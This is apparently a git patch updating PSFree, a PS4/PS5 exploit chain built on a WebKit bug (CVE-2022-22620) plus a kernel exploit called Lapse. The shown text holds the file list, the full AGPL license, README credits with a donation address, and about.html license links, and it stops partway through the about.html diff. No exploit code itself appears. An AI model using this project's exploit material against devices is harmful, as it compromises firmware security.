From 1220a577a278db9cc1bdb0e45003ca0a186a584a Mon Sep 17 00:00:00 2001
From: Kameleon <77245601+kmeps4@users.noreply.github.com>
Date: Sat, 10 May 2025 09:34:58 -0600
Subject: [PATCH] Update to psfree-1.5rc1

900 Port in process: DO NOT USE IT.
---
 COPYING                                    |  661 ++++++++
 README.md                                  |   45 +-
 about.html                                 |   42 +-
 alert.mjs                                  |   44 +-
 config.mjs                                 |  105 +-
 exploit.mjs                                |  757 ---------
 fonts/FONTS.LICENSE                        |  101 ++
 fonts/LiberationMono-Regular.ttf           |  Bin 0 -> 319624 bytes
 fonts/README.txt                           |    3 +
 index.html                                 |   63 +-
 kernel/80x.txt                             |   23 -
 kpatch/80x.c                               |  138 +-
 kpatch/80x.d                               |    1 +
 kernel/exfathax_pico.img => kpatch/80x.elf |  Bin 6144 -> 5216 bytes
 kpatch/80x.o                               |  Bin 0 -> 1832 bytes
 kpatch/Makefile                            |   10 +-
 kpatch/utils.h                             |    2 +-
 module/chain.mjs                           |  542 +++++-
 module/int64.mjs                           |  237 +--
 module/mem.mjs                             |  448 +++--
 module/memtools.mjs                        |   69 +-
 module/offset.mjs                          |   29 +-
 module/rw.mjs                              |   69 +-
 module/utils.mjs                           |  145 +-
 module/view.mjs                            |  261 +++
 psfree.mjs                                 |  863 ++++++++++
 rop/800.mjs                                | 1253 ++------------
 rop/900.mjs                                |  276 ++--
 scripts/lapse.mjs                          | 1739 ++++++++++++++++++++
 send.mjs                                   |   68 +-
 30 files changed, 5271 insertions(+), 2723 deletions(-)
 create mode 100644 COPYING
 delete mode 100644 exploit.mjs
 create mode 100644 fonts/FONTS.LICENSE
 create mode 100644 fonts/LiberationMono-Regular.ttf
 create mode 100644 fonts/README.txt
 delete mode 100644 kernel/80x.txt
 create mode 100644 kpatch/80x.d
 rename kernel/exfathax_pico.img => kpatch/80x.elf (62%)
 create mode 100644 kpatch/80x.o
 create mode 100644 module/view.mjs
 create mode 100644 psfree.mjs
 create mode 100644 scripts/lapse.mjs

diff --git a/COPYING b/COPYING
new file mode 100644
index 0000000..be3f7b2
--- /dev/null
+++ b/COPYING
@@ -0,0 +1,661 @@
+                    GNU AFFERO GENERAL PUBLIC LICENSE
+                       Version 3, 19 November 2007
+
+ Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+                            Preamble
+
+  The GNU Affero General Public License is a free, copyleft license for
+software and other kinds of works, specifically designed to ensure
+cooperation with the community in the case of network server software.
+
+  The licenses for most software and other practical works are designed
+to take away your freedom to share and change the works.  By contrast,
+our General Public Licenses are intended to guarantee your freedom to
+share and change all versions of a program--to make sure it remains free
+software for all its users.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+them if you wish), that you receive source code or can get it if you
+want it, that you can change the software or use pieces of it in new
+free programs, and that you know you can do these things.
+
+  Developers that use our General Public Licenses protect your rights
+with two steps: (1) assert copyright on the software, and (2) offer
+you this License which gives you legal permission to copy, distribute
+and/or modify the software.
+
+  A secondary benefit of defending all users' freedom is that
+improvements made in alternate versions of the program, if they
+receive widespread use, become available for other developers to
+incorporate.  Many developers of free software are heartened and
+encouraged by the resulting cooperation.  However, in the case of
+software used on network servers, this result may fail to come about.
+The GNU General Public License permits making a modified version and
+letting the public access it on a server without ever releasing its
+source code to the public.
+
+  The GNU Affero General Public License is designed specifically to
+ensure that, in such cases, the modified source code becomes available
+to the community.  It requires the operator of a network server to
+provide the source code of the modified version running there to the
+users of that server.  Therefore, public use of a modified version, on
+a publicly accessible server, gives the public access to the source
+code of the modified version.
+
+  An older license, called the Affero General Public License and
+published by Affero, was designed to accomplish similar goals.  This is
+a different license, not a version of the Affero GPL, but Affero has
+released a new version of the Affero GPL which permits relicensing under
+this license.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+                       TERMS AND CONDITIONS
+
+  0. Definitions.
+
+  "This License" refers to version 3 of the GNU Affero General Public License.
+
+  "Copyright" also means copyright-like laws that apply to other kinds of
+works, such as semiconductor masks.
+
+  "The Program" refers to any copyrightable work licensed under this
+License.  Each licensee is addressed as "you".  "Licensees" and
+"recipients" may be individuals or organizations.
+
+  To "modify" a work means to copy from or adapt all or part of the work
+in a fashion requiring copyright permission, other than the making of an
+exact copy.  The resulting work is called a "modified version" of the
+earlier work or a work "based on" the earlier work.
+
+  A "covered work" means either the unmodified Program or a work based
+on the Program.
+
+  To "propagate" a work means to do anything with it that, without
+permission, would make you directly or secondarily liable for
+infringement under applicable copyright law, except executing it on a
+computer or modifying a private copy.  Propagation includes copying,
+distribution (with or without modification), making available to the
+public, and in some countries other activities as well.
+
+  To "convey" a work means any kind of propagation that enables other
+parties to make or receive copies.  Mere interaction with a user through
+a computer network, with no transfer of a copy, is not conveying.
+
+  An interactive user interface displays "Appropriate Legal Notices"
+to the extent that it includes a convenient and prominently visible
+feature that (1) displays an appropriate copyright notice, and (2)
+tells the user that there is no warranty for the work (except to the
+extent that warranties are provided), that licensees may convey the
+work under this License, and how to view a copy of this License.  If
+the interface presents a list of user commands or options, such as a
+menu, a prominent item in the list meets this criterion.
+
+  1. Source Code.
+
+  The "source code" for a work means the preferred form of the work
+for making modifications to it.  "Object code" means any non-source
+form of a work.
+
+  A "Standard Interface" means an interface that either is an official
+standard defined by a recognized standards body, or, in the case of
+interfaces specified for a particular programming language, one that
+is widely used among developers working in that language.
+
+  The "System Libraries" of an executable work include anything, other
+than the work as a whole, that (a) is included in the normal form of
+packaging a Major Component, but which is not part of that Major
+Component, and (b) serves only to enable use of the work with that
+Major Component, or to implement a Standard Interface for which an
+implementation is available to the public in source code form.  A
+"Major Component", in this context, means a major essential component
+(kernel, window system, and so on) of the specific operating system
+(if any) on which the executable work runs, or a compiler used to
+produce the work, or an object code interpreter used to run it.
+
+  The "Corresponding Source" for a work in object code form means all
+the source code needed to generate, install, and (for an executable
+work) run the object code and to modify the work, including scripts to
+control those activities.  However, it does not include the work's
+System Libraries, or general-purpose tools or generally available free
+programs which are used unmodified in performing those activities but
+which are not part of the work.  For example, Corresponding Source
+includes interface definition files associated with source files for
+the work, and the source code for shared libraries and dynamically
+linked subprograms that the work is specifically designed to require,
+such as by intimate data communication or control flow between those
+subprograms and other parts of the work.
+
+  The Corresponding Source need not include anything that users
+can regenerate automatically from other parts of the Corresponding
+Source.
+
+  The Corresponding Source for a work in source code form is that
+same work.
+
+  2. Basic Permissions.
+
+  All rights granted under this License are granted for the term of
+copyright on the Program, and are irrevocable provided the stated
+conditions are met.  This License explicitly affirms your unlimited
+permission to run the unmodified Program.  The output from running a
+covered work is covered by this License only if the output, given its
+content, constitutes a covered work.  This License acknowledges your
+rights of fair use or other equivalent, as provided by copyright law.
+
+  You may make, run and propagate covered works that you do not
+convey, without conditions so long as your license otherwise remains
+in force.  You may convey covered works to others for the sole purpose
+of having them make modifications exclusively for you, or provide you
+with facilities for running those works, provided that you comply with
+the terms of this License in conveying all material for which you do
+not control copyright.  Those thus making or running the covered works
+for you must do so exclusively on your behalf, under your direction
+and control, on terms that prohibit them from making any copies of
+your copyrighted material outside their relationship with you.
+
+  Conveying under any other circumstances is permitted solely under
+the conditions stated below.  Sublicensing is not allowed; section 10
+makes it unnecessary.
+
+  3. Protecting Users' Legal Rights From Anti-Circumvention Law.
+
+  No covered work shall be deemed part of an effective technological
+measure under any applicable law fulfilling obligations under article
+11 of the WIPO copyright treaty adopted on 20 December 1996, or
+similar laws prohibiting or restricting circumvention of such
+measures.
+
+  When you convey a covered work, you waive any legal power to forbid
+circumvention of technological measures to the extent such circumvention
+is effected by exercising rights under this License with respect to
+the covered work, and you disclaim any intention to limit operation or
+modification of the work as a means of enforcing, against the work's
+users, your or third parties' legal rights to forbid circumvention of
+technological measures.
+
+  4. Conveying Verbatim Copies.
+
+  You may convey verbatim copies of the Program's source code as you
+receive it, in any medium, provided that you conspicuously and
+appropriately publish on each copy an appropriate copyright notice;
+keep intact all notices stating that this License and any
+non-permissive terms added in accord with section 7 apply to the code;
+keep intact all notices of the absence of any warranty; and give all
+recipients a copy of this License along with the Program.
+
+  You may charge any price or no price for each copy that you convey,
+and you may offer support or warranty protection for a fee.
+
+  5. Conveying Modified Source Versions.
+
+  You may convey a work based on the Program, or the modifications to
+produce it from the Program, in the form of source code under the
+terms of section 4, provided that you also meet all of these conditions:
+
+    a) The work must carry prominent notices stating that you modified
+    it, and giving a relevant date.
+
+    b) The work must carry prominent notices stating that it is
+    released under this License and any conditions added under section
+    7.  This requirement modifies the requirement in section 4 to
+    "keep intact all notices".
+
+    c) You must license the entire work, as a whole, under this
+    License to anyone who comes into possession of a copy.  This
+    License will therefore apply, along with any applicable section 7
+    additional terms, to the whole of the work, and all its parts,
+    regardless of how they are packaged.  This License gives no
+    permission to license the work in any other way, but it does not
+    invalidate such permission if you have separately received it.
+
+    d) If the work has interactive user interfaces, each must display
+    Appropriate Legal Notices; however, if the Program has interactive
+    interfaces that do not display Appropriate Legal Notices, your
+    work need not make them do so.
+
+  A compilation of a covered work with other separate and independent
+works, which are not by their nature extensions of the covered work,
+and which are not combined with it such as to form a larger program,
+in or on a volume of a storage or distribution medium, is called an
+"aggregate" if the compilation and its resulting copyright are not
+used to limit the access or legal rights of the compilation's users
+beyond what the individual works permit.  Inclusion of a covered work
+in an aggregate does not cause this License to apply to the other
+parts of the aggregate.
+
+  6. Conveying Non-Source Forms.
+
+  You may convey a covered work in object code form under the terms
+of sections 4 and 5, provided that you also convey the
+machine-readable Corresponding Source under the terms of this License,
+in one of these ways:
+
+    a) Convey the object code in, or embodied in, a physical product
+    (including a physical distribution medium), accompanied by the
+    Corresponding Source fixed on a durable physical medium
+    customarily used for software interchange.
+
+    b) Convey the object code in, or embodied in, a physical product
+    (including a physical distribution medium), accompanied by a
+    written offer, valid for at least three years and valid for as
+    long as you offer spare parts or customer support for that product
+    model, to give anyone who possesses the object code either (1) a
+    copy of the Corresponding Source for all the software in the
+    product that is covered by this License, on a durable physical
+    medium customarily used for software interchange, for a price no
+    more than your reasonable cost of physically performing this
+    conveying of source, or (2) access to copy the
+    Corresponding Source from a network server at no charge.
+
+    c) Convey individual copies of the object code with a copy of the
+    written offer to provide the Corresponding Source.  This
+    alternative is allowed only occasionally and noncommercially, and
+    only if you received the object code with such an offer, in accord
+    with subsection 6b.
+
+    d) Convey the object code by offering access from a designated
+    place (gratis or for a charge), and offer equivalent access to the
+    Corresponding Source in the same way through the same place at no
+    further charge.  You need not require recipients to copy the
+    Corresponding Source along with the object code.  If the place to
+    copy the object code is a network server, the Corresponding Source
+    may be on a different server (operated by you or a third party)
+    that supports equivalent copying facilities, provided you maintain
+    clear directions next to the object code saying where to find the
+    Corresponding Source.  Regardless of what server hosts the
+    Corresponding Source, you remain obligated to ensure that it is
+    available for as long as needed to satisfy these requirements.
+
+    e) Convey the object code using peer-to-peer transmission, provided
+    you inform other peers where the object code and Corresponding
+    Source of the work are being offered to the general public at no
+    charge under subsection 6d.
+
+  A separable portion of the object code, whose source code is excluded
+from the Corresponding Source as a System Library, need not be
+included in conveying the object code work.
+
+  A "User Product" is either (1) a "consumer product", which means any
+tangible personal property which is normally used for personal, family,
+or household purposes, or (2) anything designed or sold for incorporation
+into a dwelling.  In determining whether a product is a consumer product,
+doubtful cases shall be resolved in favor of coverage.  For a particular
+product received by a particular user, "normally used" refers to a
+typical or common use of that class of product, regardless of the status
+of the particular user or of the way in which the particular user
+actually uses, or expects or is expected to use, the product.  A product
+is a consumer product regardless of whether the product has substantial
+commercial, industrial or non-consumer uses, unless such uses represent
+the only significant mode of use of the product.
+
+  "Installation Information" for a User Product means any methods,
+procedures, authorization keys, or other information required to install
+and execute modified versions of a covered work in that User Product from
+a modified version of its Corresponding Source.  The information must
+suffice to ensure that the continued functioning of the modified object
+code is in no case prevented or interfered with solely because
+modification has been made.
+
+  If you convey an object code work under this section in, or with, or
+specifically for use in, a User Product, and the conveying occurs as
+part of a transaction in which the right of possession and use of the
+User Product is transferred to the recipient in perpetuity or for a
+fixed term (regardless of how the transaction is characterized), the
+Corresponding Source conveyed under this section must be accompanied
+by the Installation Information.  But this requirement does not apply
+if neither you nor any third party retains the ability to install
+modified object code on the User Product (for example, the work has
+been installed in ROM).
+
+  The requirement to provide Installation Information does not include a
+requirement to continue to provide support service, warranty, or updates
+for a work that has been modified or installed by the recipient, or for
+the User Product in which it has been modified or installed.  Access to a
+network may be denied when the modification itself materially and
+adversely affects the operation of the network or violates the rules and
+protocols for communication across the network.
+
+  Corresponding Source conveyed, and Installation Information provided,
+in accord with this section must be in a format that is publicly
+documented (and with an implementation available to the public in
+source code form), and must require no special password or key for
+unpacking, reading or copying.
+
+  7. Additional Terms.
+
+  "Additional permissions" are terms that supplement the terms of this
+License by making exceptions from one or more of its conditions.
+Additional permissions that are applicable to the entire Program shall
+be treated as though they were included in this License, to the extent
+that they are valid under applicable law.  If additional permissions
+apply only to part of the Program, that part may be used separately
+under those permissions, but the entire Program remains governed by
+this License without regard to the additional permissions.
+
+  When you convey a copy of a covered work, you may at your option
+remove any additional permissions from that copy, or from any part of
+it.  (Additional permissions may be written to require their own
+removal in certain cases when you modify the work.)  You may place
+additional permissions on material, added by you to a covered work,
+for which you have or can give appropriate copyright permission.
+
+  Notwithstanding any other provision of this License, for material you
+add to a covered work, you may (if authorized by the copyright holders of
+that material) supplement the terms of this License with terms:
+
+    a) Disclaiming warranty or limiting liability differently from the
+    terms of sections 15 and 16 of this License; or
+
+    b) Requiring preservation of specified reasonable legal notices or
+    author attributions in that material or in the Appropriate Legal
+    Notices displayed by works containing it; or
+
+    c) Prohibiting misrepresentation of the origin of that material, or
+    requiring that modified versions of such material be marked in
+    reasonable ways as different from the original version; or
+
+    d) Limiting the use for publicity purposes of names of licensors or
+    authors of the material; or
+
+    e) Declining to grant rights under trademark law for use of some
+    trade names, trademarks, or service marks; or
+
+    f) Requiring indemnification of licensors and authors of that
+    material by anyone who conveys the material (or modified versions of
+    it) with contractual assumptions of liability to the recipient, for
+    any liability that these contractual assumptions directly impose on
+    those licensors and authors.
+
+  All other non-permissive additional terms are considered "further
+restrictions" within the meaning of section 10.  If the Program as you
+received it, or any part of it, contains a notice stating that it is
+governed by this License along with a term that is a further
+restriction, you may remove that term.  If a license document contains
+a further restriction but permits relicensing or conveying under this
+License, you may add to a covered work material governed by the terms
+of that license document, provided that the further restriction does
+not survive such relicensing or conveying.
+
+  If you add terms to a covered work in accord with this section, you
+must place, in the relevant source files, a statement of the
+additional terms that apply to those files, or a notice indicating
+where to find the applicable terms.
+
+  Additional terms, permissive or non-permissive, may be stated in the
+form of a separately written license, or stated as exceptions;
+the above requirements apply either way.
+
+  8. Termination.
+
+  You may not propagate or modify a covered work except as expressly
+provided under this License.  Any attempt otherwise to propagate or
+modify it is void, and will automatically terminate your rights under
+this License (including any patent licenses granted under the third
+paragraph of section 11).
+
+  However, if you cease all violation of this License, then your
+license from a particular copyright holder is reinstated (a)
+provisionally, unless and until the copyright holder explicitly and
+finally terminates your license, and (b) permanently, if the copyright
+holder fails to notify you of the violation by some reasonable means
+prior to 60 days after the cessation.
+
+  Moreover, your license from a particular copyright holder is
+reinstated permanently if the copyright holder notifies you of the
+violation by some reasonable means, this is the first time you have
+received notice of violation of this License (for any work) from that
+copyright holder, and you cure the violation prior to 30 days after
+your receipt of the notice.
+
+  Termination of your rights under this section does not terminate the
+licenses of parties who have received copies or rights from you under
+this License.  If your rights have been terminated and not permanently
+reinstated, you do not qualify to receive new licenses for the same
+material under section 10.
+
+  9. Acceptance Not Required for Having Copies.
+
+  You are not required to accept this License in order to receive or
+run a copy of the Program.  Ancillary propagation of a covered work
+occurring solely as a consequence of using peer-to-peer transmission
+to receive a copy likewise does not require acceptance.  However,
+nothing other than this License grants you permission to propagate or
+modify any covered work.  These actions infringe copyright if you do
+not accept this License.  Therefore, by modifying or propagating a
+covered work, you indicate your acceptance of this License to do so.
+
+  10. Automatic Licensing of Downstream Recipients.
+
+  Each time you convey a covered work, the recipient automatically
+receives a license from the original licensors, to run, modify and
+propagate that work, subject to this License.  You are not responsible
+for enforcing compliance by third parties with this License.
+
+  An "entity transaction" is a transaction transferring control of an
+organization, or substantially all assets of one, or subdividing an
+organization, or merging organizations.  If propagation of a covered
+work results from an entity transaction, each party to that
+transaction who receives a copy of the work also receives whatever
+licenses to the work the party's predecessor in interest had or could
+give under the previous paragraph, plus a right to possession of the
+Corresponding Source of the work from the predecessor in interest, if
+the predecessor has it or can get it with reasonable efforts.
+
+  You may not impose any further restrictions on the exercise of the
+rights granted or affirmed under this License.  For example, you may
+not impose a license fee, royalty, or other charge for exercise of
+rights granted under this License, and you may not initiate litigation
+(including a cross-claim or counterclaim in a lawsuit) alleging that
+any patent claim is infringed by making, using, selling, offering for
+sale, or importing the Program or any portion of it.
+
+  11. Patents.
+
+  A "contributor" is a copyright holder who authorizes use under this
+License of the Program or a work on which the Program is based.  The
+work thus licensed is called the contributor's "contributor version".
+
+  A contributor's "essential patent claims" are all patent claims
+owned or controlled by the contributor, whether already acquired or
+hereafter acquired, that would be infringed by some manner, permitted
+by this License, of making, using, or selling its contributor version,
+but do not include claims that would be infringed only as a
+consequence of further modification of the contributor version.  For
+purposes of this definition, "control" includes the right to grant
+patent sublicenses in a manner consistent with the requirements of
+this License.
+
+  Each contributor grants you a non-exclusive, worldwide, royalty-free
+patent license under the contributor's essential patent claims, to
+make, use, sell, offer for sale, import and otherwise run, modify and
+propagate the contents of its contributor version.
+
+  In the following three paragraphs, a "patent license" is any express
+agreement or commitment, however denominated, not to enforce a patent
+(such as an express permission to practice a patent or covenant not to
+sue for patent infringement).  To "grant" such a patent license to a
+party means to make such an agreement or commitment not to enforce a
+patent against the party.
+
+  If you convey a covered work, knowingly relying on a patent license,
+and the Corresponding Source of the work is not available for anyone
+to copy, free of charge and under the terms of this License, through a
+publicly available network server or other readily accessible means,
+then you must either (1) cause the Corresponding Source to be so
+available, or (2) arrange to deprive yourself of the benefit of the
+patent license for this particular work, or (3) arrange, in a manner
+consistent with the requirements of this License, to extend the patent
+license to downstream recipients.  "Knowingly relying" means you have
+actual knowledge that, but for the patent license, your conveying the
+covered work in a country, or your recipient's use of the covered work
+in a country, would infringe one or more identifiable patents in that
+country that you have reason to believe are valid.
+
+  If, pursuant to or in connection with a single transaction or
+arrangement, you convey, or propagate by procuring conveyance of, a
+covered work, and grant a patent license to some of the parties
+receiving the covered work authorizing them to use, propagate, modify
+or convey a specific copy of the covered work, then the patent license
+you grant is automatically extended to all recipients of the covered
+work and works based on it.
+
+  A patent license is "discriminatory" if it does not include within
+the scope of its coverage, prohibits the exercise of, or is
+conditioned on the non-exercise of one or more of the rights that are
+specifically granted under this License.  You may not convey a covered
+work if you are a party to an arrangement with a third party that is
+in the business of distributing software, under which you make payment
+to the third party based on the extent of your activity of conveying
+the work, and under which the third party grants, to any of the
+parties who would receive the covered work from you, a discriminatory
+patent license (a) in connection with copies of the covered work
+conveyed by you (or copies made from those copies), or (b) primarily
+for and in connection with specific products or compilations that
+contain the covered work, unless you entered into that arrangement,
+or that patent license was granted, prior to 28 March 2007.
+
+  Nothing in this License shall be construed as excluding or limiting
+any implied license or other defenses to infringement that may
+otherwise be available to you under applicable patent law.
+
+  12. No Surrender of Others' Freedom.
+
+  If conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot convey a
+covered work so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you may
+not convey it at all.  For example, if you agree to terms that obligate you
+to collect a royalty for further conveying from those to whom you convey
+the Program, the only way you could satisfy both those terms and this
+License would be to refrain entirely from conveying the Program.
+
+  13. Remote Network Interaction; Use with the GNU General Public License.
+
+  Notwithstanding any other provision of this License, if you modify the
+Program, your modified version must prominently offer all users
+interacting with it remotely through a computer network (if your version
+supports such interaction) an opportunity to receive the Corresponding
+Source of your version by providing access to the Corresponding Source
+from a network server at no charge, through some standard or customary
+means of facilitating copying of software.  This Corresponding Source
+shall include the Corresponding Source for any work covered by version 3
+of the GNU General Public License that is incorporated pursuant to the
+following paragraph.
+
+  Notwithstanding any other provision of this License, you have
+permission to link or combine any covered work with a work licensed
+under version 3 of the GNU General Public License into a single
+combined work, and to convey the resulting work.  The terms of this
+License will continue to apply to the part which is the covered work,
+but the work with which it is combined will remain governed by version
+3 of the GNU General Public License.
+
+  14. Revised Versions of this License.
+
+  The Free Software Foundation may publish revised and/or new versions of
+the GNU Affero General Public License from time to time.  Such new versions
+will be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+  Each version is given a distinguishing version number.  If the
+Program specifies that a certain numbered version of the GNU Affero General
+Public License "or any later version" applies to it, you have the
+option of following the terms and conditions either of that numbered
+version or of any later version published by the Free Software
+Foundation.  If the Program does not specify a version number of the
+GNU Affero General Public License, you may choose any version ever published
+by the Free Software Foundation.
+
+  If the Program specifies that a proxy can decide which future
+versions of the GNU Affero General Public License can be used, that proxy's
+public statement of acceptance of a version permanently authorizes you
+to choose that version for the Program.
+
+  Later license versions may give you additional or different
+permissions.  However, no additional obligations are imposed on any
+author or copyright holder as a result of your choosing to follow a
+later version.
+
+  15. Disclaimer of Warranty.
+
+  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
+APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
+HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
+OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
+THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
+IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
+ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
+
+  16. Limitation of Liability.
+
+  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
+THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
+GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
+USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
+DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
+PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
+EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
+SUCH DAMAGES.
+
+  17. Interpretation of Sections 15 and 16.
+
+  If the disclaimer of warranty and limitation of liability provided
+above cannot be given local legal effect according to their terms,
+reviewing courts shall apply local law that most closely approximates
+an absolute waiver of all civil liability in connection with the
+Program, unless a warranty or assumption of liability accompanies a
+copy of the Program in return for a fee.
+
+                     END OF TERMS AND CONDITIONS
+
+            How to Apply These Terms to Your New Programs
+
+  If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+  To do so, attach the following notices to the program.  It is safest
+to attach them to the start of each source file to most effectively
+state the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+    <one line to give the program's name and a brief idea of what it does.>
+    Copyright (C) <year>  <name of author>
+
+    This program is free software: you can redistribute it and/or modify
+    it under the terms of the GNU Affero General Public License as published by
+    the Free Software Foundation, either version 3 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU Affero General Public License for more details.
+
+    You should have received a copy of the GNU Affero General Public License
+    along with this program.  If not, see <https://www.gnu.org/licenses/>.
+
+Also add information on how to contact you by electronic and paper mail.
+
+  If your software can interact with users remotely through a computer
+network, you should also make sure that it provides a way for users to
+get its source.  For example, if your program is a web application, its
+interface could display a "Source" link that leads users to an archive
+of the code.  There are many ways you could offer source, and different
+solutions will be better for different programs; see section 13 for the
+specific requirements.
+
+  You should also get your employer (if you work as a programmer) or school,
+if any, to sign a "copyright disclaimer" for the program, if necessary.
+For more information on this, and how to apply and follow the GNU AGPL, see
+<https://www.gnu.org/licenses/>.
diff --git a/README.md b/README.md
index 6ca1cf3..a1ab8d0 100644
--- a/README.md
+++ b/README.md
@@ -1,33 +1,20 @@
-PSFree version 1.4.0
+# PSFree version 1.5.0
 
-PSFree is a WebKit exploit using CVE-2022-22620 to gain arbitrary read/write.
+PSFree is a collection of exploits for the PS4 console. The main focus of the 
+repo is for the PS4 but we try to make things portable to PS5.
 
-vulnerable:
-* PS4 6.xx-9.xx (tested 6.00-9.60)
-* PS5 1.xx-5.xx (tested 1.00-5.50)
+* Exploits
+  * PSFree: src/psfree.mjs
+  * Lapse (kernel): src/scripts/lapse.mjs
 
-CREDITS:
+Donation (Monero/XMR):
+86Fk3X9AE94EGKidzRbvyiVgGNYD3qZnuKNq1ZbsomFWXHYm6TtAgz9GNGitPWadkS3Wr9uXoT29U1SfdMtJ7QNKQpW1CVS
+
+# COPYRIGHT AND AUTHORS:
+AGPL-3.0-or-later (see src/COPYING). This repo belongs to the group
+`anonymous`. We refer to anonymous contributors as "anonymous" as well.
+
+# CREDITS:
 * anonymous for PS4 firmware kernel dumps
-
-* janisslsm from ps4-dev on discord.com
-  * contributed ROP chain managers for 8.5x and 9.0x
-  * contributer of the ROP chain manager for 9.5x
-  * Helped in figuring out the size of JSC::ArrayBufferContents and its needed
-    offsets on different firmwares.
-
-* barooney from ps4-dev on discord.com
-  * contributer of the ROP chain manager for 9.5x
-
-* CelesteBlue from ps4-dev on discord.com
-  * Helped in figuring out the size of WebCore::SerializedScriptValue and its
-    needed offsets on different firmwares.
-  * figured out the range of vulnerable firmwares
-
-* Kameleon_ from ps4-dev discord
-  * Asked people to test 1.3.0 (beta) on other firmwares and reported if the
-    peformance boost worked (reports from 6.72-9.60).
-
-* Quentin Meffre (@0xdagger) and Mehdi Talbi (@abu_y0ussef) for the 6.xx
-  buildBubbleTree() UaF exploit that served as the framework for the exploit.
-
-* Maddie Stone for the CVE writeup
+* Check the appropriate files for any **extra** contributors. Unless otherwise
+  stated, everything here can also be credited to us.
diff --git a/about.html b/about.html
index 1574382..2fc6be3 100644
--- a/about.html
+++ b/about.html
@@ -1,4 +1,4 @@
-<!-- Copyright (C) 2023-2024 anonymous
+<!-- Copyright (C) 2023-2025 anonymous
 
 This file is part of PSFree.
 
@@ -21,7 +21,7 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.
         <title>About PSFree</title>
     </head>
     <body>
-    PSFree is a WebKit exploit for PS4 Firmware 8.03.<br>
+    PSFree is an exploit chain for PS4 and PS5.<br>
     PSFree is free software. See <a href='./COPYING'>COPYING</a> for the copyleft information.<br>
     PSFree's license is GNU-AGPL-3.0-or-later.<br>
     Here is the source code of this program:<br>
@@ -31,6 +31,11 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.
     <a href='./about.html' download>about.html</a><br>
     JavaScript files:<br>
     <table id="jslicense-labels1">
+        <tr>
+            <td><a href="./psfree.mjs">psfree.mjs</a></td>
+            <td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
+            <td><a href="./psfree.mjs" download>download</a></td>
+        </tr>
         <tr>
             <td><a href="./alert.mjs">alert.mjs</a></td>
             <td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
@@ -41,36 +46,21 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.
             <td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
             <td><a href="./config.mjs" download>download</a></td>
         </tr>
-        <tr>
-            <td><a href="./exploit.mjs">exploit.mjs</a></td>
-            <td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
-            <td><a href="./exploit.mjs" download>download</a></td>
-        </tr>
         <tr>
             <td><a href="./send.mjs">send.mjs</a></td>
             <td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
             <td><a href="./send.mjs" download>download</a></td>
         </tr>
+        <tr>
+            <td><a href="./scripts/lapse.mjs">scripts/lapse.mjs</a></td>
+            <td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
+            <td><a href="./scripts/lapse.mjs" download>download</a></td>
+        </tr>
         <tr>
             <td><a href="./rop/800.mjs">rop/800.mjs</a></td>
             <td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
             <td><a href="./rop/800.mjs" download>download</a></td>
         </tr>
-        <tr>
-            <td><a href="./rop/950.mjs">rop/950.mjs</a></td>
-            <td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
-            <td><a href="./rop/950.mjs" download>download</a></td>
-        </tr>
-        <tr>
-            <td><a href="./rop/850.mjs">rop/850.mjs</a></td>
-            <td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
-            <td><a href="./rop/850.mjs" download>download</a></td>
-        </tr>
